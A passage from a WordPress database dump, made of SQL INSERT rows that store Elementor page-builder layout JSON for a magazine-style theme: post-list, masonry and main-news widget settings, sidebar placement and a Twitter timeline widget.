nit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"g7mt24q\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cfab1ec\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1212,440,'_elementor_version','0.4'),(1213,440,'_elementor_css','a:3:{s:4:\"time\";i:1508883234;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1217,2,'_elementor_data','[{\"id\":\"gmwrczs\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"5wcijtz\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"8qgudh6\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"category_border_color\":\"#4a00b4\",\"title_font_size\":{\"unit\":\"px\",\"size\":14},\"use_excerpt\":\"\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"q9jlzjp\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7ziad57\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1218,442,'_elementor_edit_mode','builder'),(1219,442,'_elementor_data','[{\"id\":\"u1tc392\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"vghfmaj\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gysyscs\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1220,2,'_elementor_version','0.4'),(1222,378,'_elementor_edit_mode','builder'),(1225,411,'post_views_count','78'),(1226,378,'_elementor_data','[{\"id\":\"ixiyn7h\",\"elType\":\"section\",\"settings\":{\"gap\":\"extended\",\"structure\":\"22\"},\"elements\":[{\"id\":\"vzzha0l\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"rnv8c37\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"2\"],\"category_border_color\":\"#23a455\",\"title_font_size\":{\"unit\":\"px\",\"size\":14},\"use_excerpt\":\"\",\"button_bg_color\":\"#23a455\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"luwf0d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"48vhr8l\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Follow me on Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1227,444,'_elementor_edit_mode','builder'),(1228,444,'_elementor_css','a:4:{s:4:\"time\";i:1508892493;s:5:\"fonts\";a:0:{}s:6:\"status\";s:5:\"empty\";s:3:\"css\";s:0:\"\";}'),(1229,444,'_elementor_data','[{\"id\":\"cmkiwh2\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"ml5koxa\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"xu0xnwk\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"100\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"width\":\"600\",\"height\":\"600\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":false},{\"id\":\"pn9edz5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1230,378,'_elementor_version','0.4'),(1231,445,'_elementor_edit_mode','builder'),(1232,445,'_elementor_data','[{\"id\":\"cmkiwh2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ml5koxa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"xu0xnwk\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"100\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"width\":\"600\",\"height\":\"600\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1233,445,'_elementor_version','0.4'),(1235,446,'_elementor_edit_mode','builder');
INSERT INTO `wpfy_postmeta` VALUES (1236,446,'_elementor_data','[{\"id\":\"shulx0s\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"hkgr41x\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"2vaavc4\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"width\":\"600\",\"height\":\"600\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":false},{\"id\":\"amtt9dp\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4k1c7ln\",\"elType\":\"widget\",\"settings\":{\"sidebar\":\"primary-sidebar\"},\"elements\":[],\"widgetType\":\"sidebar\"}],\"isInner\":false}],\"isInner\":false}]'),(1237,446,'_elementor_version','0.4'),(1238,446,'_elementor_css','a:3:{s:4:\"time\";i:1508892755;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1240,447,'_elementor_edit_mode','builder'),(1241,447,'_elementor_data','[{\"id\":\"ixiyn7h\",\"elType\":\"section\",\"settings\":{\"gap\":\"extended\",\"structure\":\"22\"},\"elements\":[{\"id\":\"vzzha0l\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"ngknvkp\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"width\":\"600\",\"height\":\"600\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":false},{\"id\":\"luwf0d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1242,447,'_elementor_version','0.4'),(1243,447,'_elementor_css','a:3:{s:4:\"time\";i:1508892921;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1244,448,'_elementor_edit_mode','builder'),(1245,448,'_elementor_data','[{\"id\":\"ixiyn7h\",\"elType\":\"section\",\"settings\":{\"gap\":\"extended\",\"structure\":\"22\"},\"elements\":[{\"id\":\"vzzha0l\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"ngknvkp\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"width\":\"600\",\"height\":\"600\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":false},{\"id\":\"luwf0d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8508cfh\",\"elType\":\"widget\",\"settings\":{\"sidebar\":\"primary-sidebar\"},\"elements\":[],\"widgetType\":\"sidebar\"}],\"isInner\":false}],\"isInner\":false}]'),(1246,448,'_elementor_version','0.4'),(1248,449,'_elementor_edit_mode','builder'),(1249,449,'_elementor_data','[{\"id\":\"ixiyn7h\",\"elType\":\"section\",\"settings\":{\"gap\":\"extended\",\"structure\":\"22\"},\"elements\":[{\"id\":\"vzzha0l\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"ngknvkp\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"width\":\"600\",\"height\":\"600\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":false},{\"id\":\"luwf0d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8508cfh\",\"elType\":\"widget\",\"settings\":{\"sidebar\":\"primary-sidebar\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"34\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"sidebar\"}],\"isInner\":false}],\"isInner\":false}]'),(1250,449,'_elementor_version','0.4'),(1251,449,'_elementor_css','a:3:{s:4:\"time\";i:1508893039;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1253,450,'_elementor_edit_mode','builder'),(1254,450,'_elementor_data','[{\"id\":\"ixiyn7h\",\"elType\":\"section\",\"settings\":{\"gap\":\"extended\",\"structure\":\"22\"},\"elements\":[{\"id\":\"vzzha0l\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"ngknvkp\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"width\":\"600\",\"height\":\"600\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":false},{\"id\":\"luwf0d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8508cfh\",\"elType\":\"widget\",\"settings\":{\"sidebar\":\"primary-sidebar\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"34\",\"isLinked\":false},\"_background_background\":\"gradient\"},\"elements\":[],\"widgetType\":\"sidebar\"}],\"isInner\":false}],\"isInner\":false}]'),(1255,450,'_elementor_version','0.4'),(1256,450,'_elementor_css','a:3:{s:4:\"time\";i:1508893445;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1258,451,'_elementor_edit_mode','builder'),(1259,451,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":964},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":